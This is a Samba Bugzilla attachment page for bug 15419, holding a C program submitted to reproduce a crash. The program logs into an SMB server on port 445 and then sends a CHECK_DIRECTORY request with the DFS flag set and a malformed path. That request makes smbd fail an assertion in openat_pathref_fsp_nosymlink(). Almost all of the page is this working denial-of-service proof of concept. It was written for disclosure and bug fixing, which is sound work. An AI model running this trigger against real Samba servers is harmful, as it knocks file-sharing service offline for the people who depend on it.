The Samba-Bugzilla – Attachment 17980 Details for
Bug 15419
weird filename can cause assert to fail in openat_pathref_fsp_nosymlink()
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
program to reproduce
smbd20b.c (text/x-csrc), 7.87 KB, created by
Robert Morris
on 2023-07-13 20:23:03 UTC
(
hide
)
Description:
program to reproduce
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-13 20:23:03 UTC
Size:
7.87 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> > >char *server_ip = "127.0.0.1"; >char *username = "z"; >char *password = "xxxxxxxx"; > >int s = -1; >int uid = 0; >int tid = 0; >int fid = 0; > >unsigned int header_flags = 0; >unsigned int header_flags2 = 0; > >int >header(char *buf, int command) >{ > int ii = 0; > > // SMB-over-TCP 4-byte header > buf[ii++] = 0; // must be zero > buf[ii++] = 0; // high byte of len > *(short*)(buf+ii) = htons(sizeof(buf)-4); // non-inclusive len, filled later > ii += 2; > > // 32-byte SMB header, MS-CIFS 2.2.3.1 > buf[ii++] = 0xff; > buf[ii++] = 'S'; > buf[ii++] = 'M'; > buf[ii++] = 'B'; > buf[ii++] = command; > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = 0; // status > buf[ii++] = header_flags; // flags > *(short*)(buf+ii) = header_flags2; // flags2 > ii += 2; > *(short*)(buf+ii) = 0; // PIDHigh > ii += 2; > ii += 8; // SecurityFeatures > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = tid; // TID > ii += 2; > *(short*)(buf+ii) = 0; // PIDLow > ii += 2; > *(short*)(buf+ii) = uid; // UID > ii += 2; > *(short*)(buf+ii) = 0; // MID > ii += 2; > > return ii; >} > >void >negotiate(const char *dialect) >{ > // SMB_COM_NEGOTIATE > // dialect should probably be "NT LM 0.12" > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x72); > > // parameter block, MS-CIFS 2.2.3.2 > int param_words = 0; > buf[ii++] = param_words; // number of 16-bit words of parameters > printf("parameters start at %d\n", ii); > ii += param_words*2; > > // data block, MS-CIFS 2.2.3.3 > // SMB_COM_NEGOTIATE MS-CIFS 2.2.4.52 > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 0x02; // BufferFormat > memcpy(buf+ii, dialect, strlen(dialect) + 1); > ii += strlen(dialect) + 1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); // this works > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read negotiate response, MS-CIFS 2.2.4.52.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for negotiate response\n", cc); > printf("WordCount %d (expecting 17)\n", buf[36] & 0xff); > printf("DialectIndex %d (expecting 0)\n", *(short*)(buf+37)); > printf("SecurityMode 0x%x (expecting 0x1)\n", buf[37+2]); > } >} > >void >setup() >{ > // SMB_COM_SESSION_SETUP_ANDX > // MS-CIFS 3.2.4.2.3 > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x73); > > // parameter block, MS-CIFS 2.2.4.53.1 > int param_words = 13; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > buf[ii++] = 0xff; // AndXCommand (next command) 0xff means none > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 0; // AndXOffset > ii += 2; > *(short*)(buf+ii) = 8192; // MaxBufferSize > ii += 2; > *(short*)(buf+ii) = 2; // MaxMpxCount > ii += 2; > *(short*)(buf+ii) = 0; // VcNumber > ii += 2; > *(int*)(buf+ii) = 0; // SessionKey, from negotiate response XXX > ii += 4; > *(short*)(buf+ii) = strlen(password); // OEMPasswordLen > ii += 2; > *(short*)(buf+ii) = 0; // UnicodePasswordLen > ii += 2; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > *(int*)(buf+ii) = 0; // Capabilities > ii += 4; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > // OEMPassword > memcpy(buf+ii, password, strlen(password)); > ii += 8; > // pad > if(ii % 1) > ii++; > // AccountName > memcpy(buf+ii, username, strlen(username) + 1); > ii += strlen(username) + 1; > // PrimaryDomain > buf[ii++] = '\0'; > // NativeOS > buf[ii++] = '\0'; > // NativeLanMan > buf[ii++] = '\0'; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read session setup response, MS-CIFS 2.2.4.53.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for session setup response\n", cc); > printf("WordCount %d\n", buf[36] & 0xff); > printf("Action %d (expecting 0)\n", *(short*)(buf+41)); > uid = *(short*)(buf+32); > uid &= 0xffff; > printf("UID 0x%x\n", uid); > } >} > >void >tree_connect() >{ > // SMB_COM_TREE_CONNECT_ANDX, MS-CIFS 2.2.4.55 > { > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x75); > > // parameter block, MS-CIFS 2.2.4.53.1 > int param_words = 4; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > buf[ii++] = 0xff; // AndXCommand > buf[ii++] = 0; // Reserved > *(short*)(buf+ii) = 0; // AndXOffset > ii += 2; > *(short*)(buf+ii) = 0; // Flags > ii += 2; > *(short*)(buf+ii) = 1; // PasswordLength > ii += 2; > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = '\0'; // password > buf[ii++] = 'x'; // path > buf[ii++] = '\0'; > buf[ii++] = 'A'; // Service > buf[ii++] = ':'; > buf[ii++] = '\0'; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > // read tree connect response, MS-CIFS 2.2.4.55.2 > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for tree connect response\n", cc); > tid = *(short*)(buf+28); > tid &= 0xffff; > printf("TID 0x%x\n", tid); > } >} > >void >check_directory(char *name) >{ > // SMB_COM_CHECK_DIRECTORY, MS-CIFS 2.2.4.17 > { > char buf[128]; > memset(buf, 0xff, sizeof(buf)); > > int ii = header(buf, 0x10); > > // parameter block > int param_words = 0x00; > buf[ii++] = param_words; // number of 16-bit words of parameters > // ii is 37 at this point > > // data block > int bci = ii; > *(short*)(buf+ii) = 0; // byte count including this len (to be filled in) > ii += 2; > buf[ii++] = 0x04; // SMB_STRING > memcpy(buf+ii, name, strlen(name) + 1); > ii += strlen(name) + 1; > > *(short*)(buf+bci) = ii - bci - 2; > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > assert(ii <= sizeof(buf)); > > printf("writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = read(s, buf, sizeof(buf)); > printf("read %d for check_directory response\n", cc); > printf("check_directory Status 0x%x\n", *(unsigned int*)(buf+9)); > } >} > >int >main() >{ > signal(SIGPIPE, SIG_IGN); > signal(SIGTERM, SIG_IGN); > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_port = htons(445); // SMB over TCP > sin.sin_addr.s_addr = inet_addr(server_ip); > > while(1){ > s = socket(AF_INET, SOCK_STREAM, 0); > if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0) > break; > close(s); > sleep(1); > } > > sleep(1); > > negotiate("NT LM 0.12"); > setup(); > tree_connect(); > header_flags2 |= 0x1000; // DFS > check_directory("\\x//\\/"); > > sleep(1); > close(s); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=17980">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 15419
: 17980 |
17981
|
17982
|
18004
|
18005
|
18064